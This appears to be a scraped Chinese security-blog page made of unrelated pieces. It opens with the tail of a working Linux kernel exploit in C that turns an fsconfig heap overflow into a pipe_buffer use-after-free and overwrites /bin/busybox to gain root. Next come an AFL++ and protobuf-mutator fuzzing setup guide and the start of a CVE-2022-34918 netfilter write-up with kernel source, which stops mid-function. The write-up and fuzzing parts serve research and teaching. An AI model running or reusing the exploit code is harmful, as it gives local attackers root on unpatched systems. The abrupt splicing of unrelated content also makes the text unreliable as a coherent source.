uint64_t *oob_data = (uint64_t *)(msg_a_oob.mtext + sizeof(msg_a.mtext));
size_t oob_size = sizeof(msg_a_oob.mtext) - sizeof(msg_a.mtext);
struct msg_msg *p = (struct msg_msg *)oob_data;
if (((int *)&p->mtext)[0] != MSG_SIG) {
logd("[-] bad luck, we don't catch 0x400 msg_msg\n");
clean_msq_2();
return 1;
}
logd("[*] it works :)\n");

list2_leak_msqid = msqid_2[((int *)&p->mtext)[1]];
list2_leak_mtype = p->m_type;
list2_uaf_msg_addr = p->m_list.prev;
list2_uaf_mtype = p->m_type - 0x0100;
msqid_2[((int *)&p->mtext)[1]] = msgget(IPC_PRIVATE, IPC_CREAT | 0666);
hexdump(msg_a_oob.mtext + sizeof(msg_a.mtext), 0x40);
logd("[+] leak list2_leak_msqid: %d\n", list2_leak_msqid);
logd("[+] leak list2_leak_mtype: 0x%x\n", list2_leak_mtype);
logd("[+] leak list2_uaf_msg_addr: 0x%lx\n", list2_uaf_msg_addr);
logd("[+] leak list2_uaf_mtype: 0x%x\n", list2_uaf_mtype);
}

logd("[*] alloc msg_msg as heap buffer with known address\n");
{
for (int j = ((list2_leak_mtype + 0x100) >> 8); j < 0x10; j++) {
msgrcv(list2_leak_msqid, &msg_b, sizeof(msg_b.mtext), MTYPE_B | (j << 8), IPC_NOWAIT);
}
memset(buff, 0, sizeof(buff));
struct msg_msg *p = (struct msg_msg *)buff;
p->m_list.next = list2_uaf_msg_addr;
p->m_list.prev = 0xdeadbeefdeadbeef;
p->m_type = MTYPE_A;

memset(&msg_b, 0, sizeof(msg_b));
memcpy(msg_b.mtext, buff, sizeof(msg_b.mtext));
msg_b.mtype = MTYPE_B;
if (msgsnd(list2_leak_msqid, &msg_b, sizeof(msg_b.mtext), 0) < 0) {
logd("[-] msgsnd() fail\n");
die();
}
}

logd("[*] fetch heap_buffer address by oob read again\n");
{
ssize_t copy_size = msgrcv(list1_corrupted_msqid, &msg_a_oob, sizeof(msg_a_oob.mtext), 0, MSG_COPY | IPC_NOWAIT);
if ((copy_size < 0) || (copy_size != sizeof(msg_a_oob.mtext))) {
logd("[-] Recv from corrupted msg_msg failed\n");
die();
}
uint64_t *oob_data = (uint64_t *)(msg_a_oob.mtext + sizeof(msg_a.mtext));
size_t oob_size = sizeof(msg_a_oob.mtext) - sizeof(msg_a.mtext);
struct msg_msg *p = (struct msg_msg *)oob_data;
if (((int *)&p->mtext)[0] != MSG_SIG) {
logd("[-] I don't think this can happen\n");
die();
}
heap_buffer_addr = p->m_list.next + sizeof(struct msg_msg);
logd("[+] heap_buffer_addr: 0x%lx\n", heap_buffer_addr);
if (strlen((char *)&heap_buffer_addr) < 8) {
logd("[-] pointer can't contain 0x00 bytes\n");
die();
}
}

// clean uncorrupted msg_msg
logd("[*] clean unused msg_msg ...\n");
clean_msq_2();

return 0;
}

int exploit_step2(int fd) {
char buff[0x1000];

logd("[*] prepare fsconfig heap overflow\n");
for (int i = 0; i < 0xff; i++) {
fsconfig(fd, FSCONFIG_SET_STRING, "aaaaaaa", "bbbbbbb", 0);
}
fsconfig(fd, FSCONFIG_SET_STRING, "cccccccc", "ddddd", 0);

// alloc msg_msg with 0x1000(-0x30) body and 0x400(-0x08) msg_msgseg
logd("[*] sparying msg_msg ...\n");
for (int i = 0; i < NUM_MSQIDS_1; i++) {
memset(&msg_a, 0, sizeof(msg_a));
msg_a.mtype = MTYPE_A;
memset(msg_a.mtext, 'Q', sizeof(msg_a.mtext));
((int *)&msg_a.mtext)[0] = MSG_SIG;
((int *)&msg_a.mtext)[1] = i;
if (msgsnd(msqid_1[i], &msg_a, sizeof(msg_a.mtext), 0) < 0) {
logd("[-] msgsnd() fail\n");
die();
}
}

// trigger oob write to overwrite msg_msg.next (hopes)
logd("[*] trigger oob write in `legacy_parse_param` to corrupt msg_msg.next\n");
memset(buff, 0, sizeof(buff));
struct msg_msg *p = (struct msg_msg *)buff;
p->m_list.next = heap_buffer_addr;
p->m_list.prev = 0xdeadbeefdeadbeef;
p->m_type = MTYPE_A; // with '=' appended
fsconfig(fd, FSCONFIG_SET_STRING, buff, "\x00", 0);

// free uaf msg_msg
logd("[*] free uaf msg_msg from correct msqid\n");
if (msgrcv(list2_leak_msqid, &msg_b, sizeof(msg_b.mtext), list2_uaf_mtype, 0) < 0) {
logd("[-] msgrcv() fail\n");
die();
}

// spary skbuff_data to re-acquire uaf msg_msg and fake the header
logd("[*] spray skbuff_data to re-acquire the 0x400 slab freed by msg_msg\n");
{
memset(buff, 0, sizeof(buff));
struct msg_msg *p = (struct msg_msg *)buff;
p->m_list.next = heap_buffer_addr + 0x80;
p->m_list.prev = heap_buffer_addr + 0x80;
p->m_ts = 0x100;
p->m_type = MTYPE_FAKE;
p->next = 0;
p->security = 0;
spray_skbuff_data(buff, 0x400 - 0x140);
}

// free uaf msg_msg
logd("[*] free skbuff_data using fake msqid\n");
for (int i = 0; i < NUM_MSQIDS_1; i++) {
if (msgrcv(msqid_1[i], &msg_b, sizeof(msg_b.mtext), MTYPE_FAKE, IPC_NOWAIT) > 0) {
logd("[*] freed using msqid %d\n", i);
break;
}
}

// filled with pipe_buffer
logd("[*] spray pipe_buffer to re-acquire the 0x400 slab freed by skbuff_data\n");
int busybox = open("/bin/busybox", O_RDONLY);
if (busybox < 0) {
perror("open busybox");
die();
}
for (int i = 0; i < NUM_PIPES; i++) {
if (pipe(dummy_pipe[i])) {
logd("[-] Alloc pipe failed\n");
die();
}

const unsigned pipe_size = fcntl(dummy_pipe[i][1], F_GETPIPE_SZ);
static char tmp_buff[4096];

/* fill the pipe completely; each pipe_buffer will now have
the PIPE_BUF_FLAG_CAN_MERGE flag */
for (unsigned r = pipe_size; r > 0;) {
unsigned n = r > sizeof(tmp_buff) ? sizeof(tmp_buff) : r;
write(dummy_pipe[i][1], tmp_buff, n);
r -= n;
}

/* drain the pipe, freeing all pipe_buffer instances (but
leaving the flags initialized) */
for (unsigned r = pipe_size; r > 0;) {
unsigned n = r > sizeof(tmp_buff) ? sizeof(tmp_buff) : r;
read(dummy_pipe[i][0], tmp_buff, n);
r -= n;
}

write(dummy_pipe[i][1], buff, 0x100 + i);

loff_t offset = 1;
ssize_t nbytes = splice(busybox, &offset, dummy_pipe[i][1], NULL, 1, 0);
if (nbytes < 0) {
perror("splice failed");
die();
}
}

logd("[*] free skbuff_data to make pipe_buffer become UAF\n");
int uaf_pipe_idx = 0;
char pipe_buffer_backup[0x280];
int PIPE_BUF_FLAG_CAN_MERGE = 0x10;
{
void *ptr = buff;
uint64_t size = 0x400 - 0x140;
for (int i = 0; i < NUM_SOCKETS; i++) {
for (int j = 0; j < NUM_SKBUFFS; j++) {
if (read(sock_pairs[i][1], ptr, size) < 0) {
logd("[-] read from sock pairs failed\n");
die();
}
uint32_t test_size = ((uint32_t *)ptr)[3];
if ((test_size >= 0x100) && (test_size < 0x100 + NUM_PIPES)) {
uaf_pipe_idx = test_size - 0x100;
logd("[*] uaf_pipe_idx: %d\n", uaf_pipe_idx);
memcpy(pipe_buffer_backup, ptr, 0x280);
}
}
}
}

logd("[*] edit pipe_buffer->flags\n");
{
memset(buff, 0, sizeof(buff));
memcpy(buff, pipe_buffer_backup, 0x280);
((uint64_t *)buff)[6] = 0; // offset | len
((uint64_t *)buff)[8] = PIPE_BUF_FLAG_CAN_MERGE; // flag
spray_skbuff_data(buff, 0x400 - 0x140);
}

logd("[*] try to overwrite /bin/busybox\n");
{
ssize_t nbytes = write(dummy_pipe[uaf_pipe_idx][1], elfcode, sizeof(elfcode));
if (nbytes < 0) {
perror("write failed");
die();
}
if ((size_t)nbytes < 2) {
fprintf(stderr, "short write\n");
die();
}
}

logd("[+] exploit success\n");
return 0;
}

int main(void) {
int sync_pipe[2];
pipe(sync_pipe);

pid_t pid = fork();
if (!pid) {
logd("[+] perform initialization\n");
init_unshare();
bind_cpu();
init_msq();
init_sock();

int fd;

fd = call_fsopen();
logd("[+] perform exploit step1\n");
while (exploit_step1(fd)) {
logd("[!] retry step1 ...\n");

close(fd);
fd = call_fsopen();
}

fd = call_fsopen();
logd("[+] perform exploit step2\n");
while (exploit_step2(fd)) {
logd("[!] retry step2 ...\n");

close(fd);
fd = call_fsopen();
}

write(sync_pipe[1], "A", 1);
while (1) {
sleep(10);
}
} else {
char sync;
read(sync_pipe[0], &sync, 1);
}

return 0;
}

AFL++ 安装

AFL(American Fuzzy Lop)是由安全研究员 Michał Zalewski 开发的一款基于覆盖引导(Coverage-guided)的模糊测试工具

AFL++ 除了继承AFL的功能外,还添加了以下功能:

  • 并行测试:允许在多个处理器核心上运行测试,以加速测试过程
  • 基于云的测试:将测试工作负载部署到云服务器上,以节省本地资源
  • 自适应测试:根据目标程序的复杂性和测试历史来调整测试策略,以提高测试效果

安装依赖:

1
2
3
4
sudo apt-get update
sudo apt-get install -y build-essential python3-dev automake git flex bison libglib2.0-dev libpixman-1-dev python3-setuptools
sudo apt-get install -y lld-11 llvm-11 llvm-11-dev clang-11 || sudo apt-get install -y lld llvm llvm-dev clang
sudo apt-get install -y gcc-$(gcc --version|head -n1|sed 's/.* //'|sed 's/\..*//')-plugin-dev libstdc++-$(gcc --version|head -n1|sed 's/.* //'|sed 's/\..*//')-dev

安装 AFL++:

1
2
3
4
git clone https://github.com/AFLplusplus/AFLplusplus && cd AFLplusplus
export LLVM_CONFIG="llvm-config-11"
make distrib
sudo make install

protobuf && libprotobuf

Protocol Buffers 是一个开源的序列化协议,用于将数据结构序列化为二进制格式,以便在网络上传输和使用

1
2
3
4
5
6
7
8
wget https://github.com/protocolbuffers/protobuf/releases/download/v3.14.0/protobuf-cpp-3.14.0.zip
unzip protobuf-cpp-3.14.0.zip
cd protobuf-3.14.0
./autogen.sh
./configure
make -j8
sudo make install
sudo ldconfig
  • PS:新版本的 Protocol Buffers 需要 g++14 的支持

libprotobuf 是 protobuf 库的 C++ 实现,在 afl-libprotobuf-mutator 的 build 脚本中会自动安装 libprotobuf(同样需要 g++14 的支持)

afl-libprotobuf-mutator 安装

afl-libprotobuf-mutator 是一个模糊测试工具,用于对基于 Protocol Buffers 协议编写的程序进行模糊测试,它是一个基于AFL(American Fuzzy Lop)的扩展,专为 Protocol Buffers 提供了一种特殊的模糊测试方法

  • Protocol Buffers 是一种轻量级数据交换格式,用于序列化和反序列化结构化数据
  • afl-libprotobuf-mutator 允许您使用 AFL 的随机测试用例来攻击基于 Protocol Buffers 的程序,从而找到潜在的错误和漏洞

在测试过程中,afl-libprotobuf-mutator 将自动为 Protocol Buffers 消息生成随机 mutations,并将其传递给目标程序,AFL 将分析目标程序的行为并报告潜在的错误

1
git clone https://github.com/thebabush/afl-libprotobuf-mutator.git

在开始编译前需要修改 build.sh 以降低 libprotobuf 对 g++ 版本的需求:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
#!/bin/bash

git clone https://github.com/google/libprotobuf-mutator.git
cd libprotobuf-mutator
git checkout e33a10c9db21244f6e27f13b4df02c72cc625573
cd ..
sed -i "/CONFIGURE_COMMAND/a \ \ \ \ \ \ \ \ -DCMAKE_NO_SYSTEM_FROM_IMPORTED=TRUE" libprotobuf-mutator/cmake/external/protobuf.cmake
mkdir -p external
mkdir -p build

pushd build
cmake ../libprotobuf-mutator -DLIB_PROTO_MUTATOR_DOWNLOAD_PROTOBUF=1 -DCMAKE_INSTALL_PREFIX=../external/ -DCMAKE_C_FLAGS="-fPIC" -DCMAKE_CXX_FLAGS="-fPIC"
make -j 12
make install
popd

mkdir -p ./external/bin ./external/include ./external/lib/
cp -r ./build/external.protobuf/include/* ./external/include
cp ./build/external.protobuf/bin/protoc ./external/bin/

然后检查 afl-libprotobuf-mutator/src/mutator.cc 的 AFLPlusPlus 接口是否匹配(若不匹配可以直接修改函数名)

最后开始编译:

1
2
cd afl-libprotobuf-mutator
./build.sh && make
  • 在当前工作路径下将会生成 dumperlibmutator.somutator 三个文件

protobuf_ctf_fuzz 安装

protobuf_ctf_fuzz 是一个大佬制作的 ctf fuzz 工具,项目地址如下:

我们只需要将 protobuf_ctf_fuzz/kp_src 中的 mutator.cc 文件拷贝到 afl-libprotobuf-mutator/src 中,再次编译 afl-libprotobuf-mutator 即可

使用 afl-libprotobuf-mutator

protobuf 代码编写完成后,覆盖保存至 afl-libprotobuf-mutator/gen/out.proto,路径必须完成一致,若遇到重名文件 out.proto 则直接替换

喂入 AFL 的 testcase 必须是 protobuf bin 格式的数据,即需要事先用 afl-libprotobuf-mutator/dumper 将明文输入转换为 protobuf bin 格式的数据

这里的 dumper.cc 需要根据 out.proto 进行编写(按照 protobuf_ctf_fuzz/kp_src/dumper.cc 中的模板进行修改即可)

重新编译 afl-libprotobuf-mutator 后使用如下命令启动:

1
2
3
4
5
6
7
8
9
mkdir workdir
mkdir workdir/fuzz_input

export AFL_CUSTOM_MUTATOR_ONLY=1
export AFL_I_DONT_CARE_ABOUT_MISSING_CRASHES=1
export AFL_CUSTOM_MUTATOR_LIBRARY=/home/yhellow/Tools/afl-libprotobuf-mutator/libmutator.so
export AFL_USE_QASAN=1

afl-fuzz -i workdir/fuzz_input -o workdir/fuzz_output -Q -- ./pwn

CVE-2022-34918

1
Linux version 5.17.15 (yhellow@yhellow-virtual-machine) (gcc (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0, GNU ld (GNU Binutils for Ubuntu) 2.34) #2 SMP PREEMPT Tue Dec 12 20:07:22 CST 2023
1
2
3
4
5
6
7
8
9
10
qemu-system-x86_64 \
-m 256M \
-nographic \
-no-reboot \
-kernel "./bzImage" \
-append "console=ttyS0 qiet loglevel=3 oops=panic panic=-1 pti=on kaslr" \
-monitor /dev/null \
-initrd "./rootfs.cpio" \
-cpu qemu64,+smep,+smap \
-smp cores=1
  • smap,smep,kaslr,pti
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#!/bin/sh
mount -t proc proc /proc
mount -t sysfs sysfs /sys
mount -t devtmpfs none /dev
/sbin/mdev -s
mkdir -p /dev/pts
mount -vt devpts -o gid=4,mode=620 none /dev/pts
chmod 666 /dev/ptmx
chown root /root/flag
chgrp root /root/flag
chmod 400 /root/flag

echo 1 > /proc/sys/kernel/kptr_restrict
echo 1 > /proc/sys/kernel/dmesg_restrict

setsid /bin/cttyhack setuidgid 1000 /bin/sh

umount /proc
umount /sys

poweroff -d 0 -f

内核下载: Index of /pub/linux/kernel/v5.x/

关键的编译选项如下:

1
2
3
4
5
6
7
CONFIG_NF_TABLES=y
CONFIG_NETFILTER_NETLINK=y
CONFIG_BINFMT_MISC=m
CONFIG_USER_NS=y

CONFIG_E1000=m
CONFIG_E1000E=m

Netfilter 介绍

Netfilter 是一个 Linux 内核模块,用于防火墙功能,它提供了一个灵活的框架,允许用户自定义防火墙规则,以控制网络流量和保护网络安全

Netfilter 模块是 Linux 内核中流量过滤器的基础,可以与多种其他模块一起使用(例如:iptables 和 ip6tables),具有如下功能:

  • 网络地址转换(Network Address Translate)
  • 数据包内容修改
  • 数据包过滤的防火墙功能

在分析 Netfilter 之前先解释一些防火墙的相关概念:

链的概念:

  • 数据报文从进入服务器到出来会经过5道关卡,分别为:
    • Prerouting(路由前)、Input(输入)、Outpu(输出)、Forward(转发)、Postrouting(路由后)
  • 每一道关卡中有多个规则,数据报文必须按顺序一个一个匹配这些规则,这些规则串起来就像一条链,所以我们把这些关卡都叫“链”

1702384117476

表的概念:

  • 每一条链上有多条规则,有些规则的作用相似,多条具有相同功能的规则合在一起就组成了一个“表”
  • Netfilter 模块拥有5个表:
    • filter 表:用于过滤包,有 INPUT、FORWARD、OUTPUT 三个链(最常用的表)
    • nat 表:用于网络地址转换,有 PREROUTING、POSTROUTING 三个链
    • managle 表:用于给数据包做标记,几乎用不到
    • raw 表:可以实现不追踪某些数据包
    • security 表:用于强制访问控制(MAC)的网络规则(在centos6中并没有)

规则的概念:

  • 规则主要包含 “条件&动作”,即匹配出符合什么条件(规则)后,对它采取怎样的动作
  • 规则被添加到指定表的指定链中,由表达式和语句组成

表达式的概念:

  • 表达式表示值,可以是网络地址、端口号等常量,也可以是在规则集评估期间从数据包中收集的数据
  • 可以使用二进制、逻辑、关系和其他类型的表达式组合表达式以形成复杂或关系(匹配)表达式
  • 每个表达式都有一个数据类型,它决定了符号值的大小、解析和表示以及与其他表达式的类型兼容性

该模块的初始化由 nfnetlink_net_init 函数执行:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
static int __net_init nfnetlink_net_init(struct net *net)
{
struct nfnl_net *nfnlnet = nfnl_pernet(net);
struct netlink_kernel_cfg cfg = {
.groups = NFNLGRP_MAX,
.input = nfnetlink_rcv,
#ifdef CONFIG_MODULES
.bind = nfnetlink_bind,
#endif
};

nfnlnet->nfnl = netlink_kernel_create(net, NETLINK_NETFILTER, &cfg);
if (!nfnlnet->nfnl)
return -ENOMEM;
return 0;
}
  • 如果后续收到 netfilter 的消息则会调用 netlink_kernel_cfg->input 函数,也即 nfnetlink_rcv 函数

创建 table 的函数:nf_tables_newtable

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
static int nf_tables_newtable(struct sk_buff *skb, const struct nfnl_info *info,
const struct nlattr * const nla[])
{
struct nftables_pernet *nft_net = nft_pernet(info->net);
struct netlink_ext_ack *extack = info->extack;
u8 genmask = nft_genmask_next(info->net);
u8 family = info->nfmsg->nfgen_family;
struct net *net = info->net;
const struct nlattr *attr;
struct nft_table *table;
struct nft_ctx ctx;
u32 flags = 0;
int err;

lockdep_assert_held(&nft_net->commit_mutex);
attr = nla[NFTA_TABLE_NAME];
table = nft_table_lookup(net, attr, family, genmask,
NETLINK_CB(skb).portid); /* 查找名称为NFTA_TABLE_NAME的table是否存在 */
if (IS_ERR(table)) {
if (PTR_ERR(table) != -ENOENT)
return PTR_ERR(table);
} else {
if (info->nlh->nlmsg_flags & NLM_F_EXCL) {
NL_SET_BAD_ATTR(extack, attr);
return -EEXIST;
}
if (info->nlh->nlmsg_flags & NLM_F_REPLACE)
return -EOPNOTSUPP;

nft_ctx_init(&ctx, net, skb, info->nlh, family, table, NULL, nla);

return nf_tables_updtable(&ctx); /* 如果存在该table,则进行更新 */
}

if (nla[NFTA_TABLE_FLAGS]) {
flags = ntohl(nla_get_be32(nla[NFTA_TABLE_FLAGS]));
if (flags & ~NFT_TABLE_F_MASK)
return -EOPNOTSUPP;
}

err = -ENOMEM;
table = kzalloc(sizeof(*table), GFP_KERNEL); /* 如果不存在就创建该表,并初始化 */
if (table == NULL)
goto err_kzalloc;

table->name = nla_strdup(attr, GFP_KERNEL);
if (table->name == NULL)
goto err_strdup;

if (nla[NFTA_TABLE_USERDATA]) {
table->udata = nla_memdup(nla[NFTA_TABLE_USERDATA], GFP_KERNEL);
if (table->udata == NULL)
goto err_table_udata;

table->udlen = nla_len(nla[NFTA_TABLE_USERDATA]);
}

err = rhltable_init(&table->chains_ht, &nft_chain_ht_params);
if (err)
goto err_chain_ht;

INIT_LIST_HEAD(&table->chains); /* 初始化4个链表 */
INIT_LIST_HEAD(&table->sets);
INIT_LIST_HEAD(&table->objects);
INIT_LIST_HEAD(&table->flowtables);
table->family = family;
table->flags = flags;
table->handle = ++table_handle;
if (table->flags & NFT_TABLE_F_OWNER)
table->nlpid = NETLINK_CB(skb).portid;

nft_ctx_init(&ctx, net, skb, info->nlh, family, table, NULL, nla); /* 将table加到nftbales上下文中 */
err = nft_trans_table_add(&ctx, NFT_MSG_NEWTABLE);
if (err < 0)
goto err_trans;

list_add_tail_rcu(&table->list, &nft_net->tables);
return 0;
err_trans:
rhltable_destroy(&table->chains_ht);
err_chain_ht:
kfree(table->udata);
err_table_udata:
kfree(table->name);
err_strdup:
kfree(table);
err_kzalloc:
return err;
}

创建 chain 的函数:nf_tables_newchain

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
static int nf_tables_newchain(struct sk_buff *skb, const struct nfnl_info *info,
const struct nlattr * const nla[])
{
struct nftables_pernet *nft_net = nft_pernet(info->net);
struct netlink_ext_ack *extack = info->extack;
u8 genmask = nft_genmask_next(info->net);
u8 family = info->nfmsg->nfgen_family;
struct nft_chain *chain = NULL;
struct net *net = info->net;
const struct nlattr *attr;
struct nft_table *table;
u8 policy = NF_ACCEPT;
struct nft_ctx ctx;
u64 handle = 0;
u32 flags = 0;

lockdep_assert_held(&nft_net->commit_mutex);

table = nft_table_lookup(net, nla[NFTA_CHAIN_TABLE], family, genmask,
NETLINK_CB(skb).portid); /* 首先先找table,无table直接退出 */
if (IS_ERR(table)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_CHAIN_TABLE]);
return PTR_ERR(table);
}

chain = NULL;
attr = nla[NFTA_CHAIN_NAME]; /* 找chain是否存在,存在进入update,不存在则添加一个新chain */

if (nla[NFTA_CHAIN_HANDLE]) { /* 通过nla[NFTA_CHAIN_HANDLE]查找chain */
handle = be64_to_cpu(nla_get_be64(nla[NFTA_CHAIN_HANDLE]));
chain = nft_chain_lookup_byhandle(table, handle, genmask);
if (IS_ERR(chain)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_CHAIN_HANDLE]);
return PTR_ERR(chain);
}
attr = nla[NFTA_CHAIN_HANDLE];
} else if (nla[NFTA_CHAIN_NAME]) { /* 通过nla[NFTA_CHAIN_NAME]查找chain */
chain = nft_chain_lookup(net, table, attr, genmask);
if (IS_ERR(chain)) {
if (PTR_ERR(chain) != -ENOENT) {
NL_SET_BAD_ATTR(extack, attr);
return PTR_ERR(chain);
}
chain = NULL;
}
} else if (!nla[NFTA_CHAIN_ID]) {
return -EINVAL;
}

if (nla[NFTA_CHAIN_POLICY]) {
if (chain != NULL &&
!nft_is_base_chain(chain)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_CHAIN_POLICY]);
return -EOPNOTSUPP;
}

if (chain == NULL &&
nla[NFTA_CHAIN_HOOK] == NULL) {
NL_SET_BAD_ATTR(extack, nla[NFTA_CHAIN_POLICY]);
return -EOPNOTSUPP;
}

policy = ntohl(nla_get_be32(nla[NFTA_CHAIN_POLICY]));
switch (policy) {
case NF_DROP:
case NF_ACCEPT:
break;
default:
return -EINVAL;
}
}

if (nla[NFTA_CHAIN_FLAGS])
flags = ntohl(nla_get_be32(nla[NFTA_CHAIN_FLAGS]));
else if (chain)
flags = chain->flags;

if (flags & ~NFT_CHAIN_FLAGS)
return -EOPNOTSUPP;

nft_ctx_init(&ctx, net, skb, info->nlh, family, table, chain, nla);

if (chain != NULL) {
if (info->nlh->nlmsg_flags & NLM_F_EXCL) {
NL_SET_BAD_ATTR(extack, attr);
return -EEXIST;
}
if (info->nlh->nlmsg_flags & NLM_F_REPLACE)
return -EOPNOTSUPP;

flags |= chain->flags & NFT_CHAIN_BASE;
return nf_tables_updchain(&ctx, genmask, policy, flags, attr,
extack); /* 找到chain则更新 */
}

return nf_tables_addchain(&ctx, family, genmask, policy, flags, extack); /* 未找到就调用该函数进行创建 */
}

创建 rule & expression 的函数:nf_tables_newrule

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
static int nf_tables_newrule(struct sk_buff *skb, const struct nfnl_info *info,
const struct nlattr * const nla[])
{
struct nftables_pernet *nft_net = nft_pernet(info->net);
struct netlink_ext_ack *extack = info->extack;
unsigned int size, i, n, ulen = 0, usize = 0;
u8 genmask = nft_genmask_next(info->net);
struct nft_rule *rule, *old_rule = NULL;
struct nft_expr_info *expr_info = NULL;
u8 family = info->nfmsg->nfgen_family;
struct nft_flow_rule *flow = NULL;
struct net *net = info->net;
struct nft_userdata *udata;
struct nft_table *table;
struct nft_chain *chain;
struct nft_trans *trans;
u64 handle, pos_handle;
struct nft_expr *expr;
struct nft_ctx ctx;
struct nlattr *tmp;
int err, rem;

lockdep_assert_held(&nft_net->commit_mutex);

table = nft_table_lookup(net, nla[NFTA_RULE_TABLE], family, genmask,
NETLINK_CB(skb).portid); /* 获取table */
if (IS_ERR(table)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_TABLE]);
return PTR_ERR(table);
}

if (nla[NFTA_RULE_CHAIN]) { /* 获取chain */
chain = nft_chain_lookup(net, table, nla[NFTA_RULE_CHAIN],
genmask);
if (IS_ERR(chain)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_CHAIN]);
return PTR_ERR(chain);
}
if (nft_chain_is_bound(chain))
return -EOPNOTSUPP;

} else if (nla[NFTA_RULE_CHAIN_ID]) {
chain = nft_chain_lookup_byid(net, nla[NFTA_RULE_CHAIN_ID]);
if (IS_ERR(chain)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_CHAIN_ID]);
return PTR_ERR(chain);
}
} else {
return -EINVAL;
}

if (nla[NFTA_RULE_HANDLE]) {
handle = be64_to_cpu(nla_get_be64(nla[NFTA_RULE_HANDLE]));
rule = __nft_rule_lookup(chain, handle);
if (IS_ERR(rule)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_HANDLE]);
return PTR_ERR(rule);
}

if (info->nlh->nlmsg_flags & NLM_F_EXCL) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_HANDLE]);
return -EEXIST;
}
if (info->nlh->nlmsg_flags & NLM_F_REPLACE)
old_rule = rule;
else
return -EOPNOTSUPP;
} else {
if (!(info->nlh->nlmsg_flags & NLM_F_CREATE) ||
info->nlh->nlmsg_flags & NLM_F_REPLACE)
return -EINVAL;
handle = nf_tables_alloc_handle(table);

if (chain->use == UINT_MAX)
return -EOVERFLOW;

if (nla[NFTA_RULE_POSITION]) {
pos_handle = be64_to_cpu(nla_get_be64(nla[NFTA_RULE_POSITION]));
old_rule = __nft_rule_lookup(chain, pos_handle);
if (IS_ERR(old_rule)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_POSITION]);
return PTR_ERR(old_rule);
}
} else if (nla[NFTA_RULE_POSITION_ID]) {
old_rule = nft_rule_lookup_byid(net, nla[NFTA_RULE_POSITION_ID]);
if (IS_ERR(old_rule)) {
NL_SET_BAD_ATTR(extack, nla[NFTA_RULE_POSITION_ID]);
return PTR_ERR(old_rule);
}
}
}

nft_ctx_init(&ctx, net, skb, info->nlh, family, table, chain, nla);

n = 0;
size = 0;
if (nla[NFTA_RULE_EXPRESSIONS]) { /* 若设置了nla[NFTA_RULE_EXPRESSIONS],会先把所有的expression遍历出来,计算其总值放在size中 */
expr_info = kvmalloc_array(NFT_RULE_MAXEXPRS,
sizeof(struct nft_expr_info),
GFP_KERNEL);
if (!expr_info)
return -ENOMEM;

nla_for_each_nested(tmp, nla[NFTA_RULE_EXPRESSIONS], rem) {
err = -EINVAL;
if (nla_type(tmp) != NFTA_LIST_ELEM)
goto err_release_expr;
if (n == NFT_RULE_MAXEXPRS)
goto err_release_expr;
err = nf_tables_expr_parse(&ctx, tmp, &expr_info[n]);
if (err < 0) {
NL_SET_BAD_ATTR(extack, tmp);
goto err_release_expr;
}
size += expr_info[n].ops->size;
n++;
}
}
/* Check for overflow of dlen field */
err = -EFBIG;
if (size >= 1 << 12)
goto err_release_expr;

if (nla[NFTA_RULE_USERDATA]) { /* 若设置了nla[NFTA_RULE_USERDATA],获取userdata的大小放在usize中 */
ulen = nla_len(nla[NFTA_RULE_USERDATA]);
if (ulen > 0)
usize = sizeof(struct nft_userdata) + ulen;
}

err = -ENOMEM;
rule = kzalloc(sizeof(*rule) + size + usize, GFP_KERNEL); /* 分配内存,创建一个rule,并初始化相关数据域 */
if (rule == NULL)
goto err_release_expr;

nft_activate_next(net, rule);

rule->handle = handle;
rule->dlen = size;
rule->udata = ulen ? 1 : 0;

if (ulen) {
udata = nft_userdata(rule);
udata->len = ulen - 1;
nla_memcpy(udata->data, nla[NFTA_RULE_USERDATA], ulen);
}

expr = nft_expr_first(rule);
for (i = 0; i < n; i++) {
err = nf_tables_newexpr(&ctx, &expr_info[i], expr);
if (err < 0) {
NL_SET_BAD_ATTR(extack, expr_info[i].attr);
goto err_release_rule;
}

if (expr_info[i].ops->validate)
nft_validate_state_update(net, NFT_VALIDATE_NEED);

expr_info[i].ops = NULL;
expr = nft_expr_next(expr);
}

if (chain->flags & NFT_CHAIN_HW_OFFLOAD) {
flow = nft_flow_rule_create(net, rule);
if (IS_ERR(flow)) {
err = PTR_ERR(flow);
goto err_release_rule;
}
}

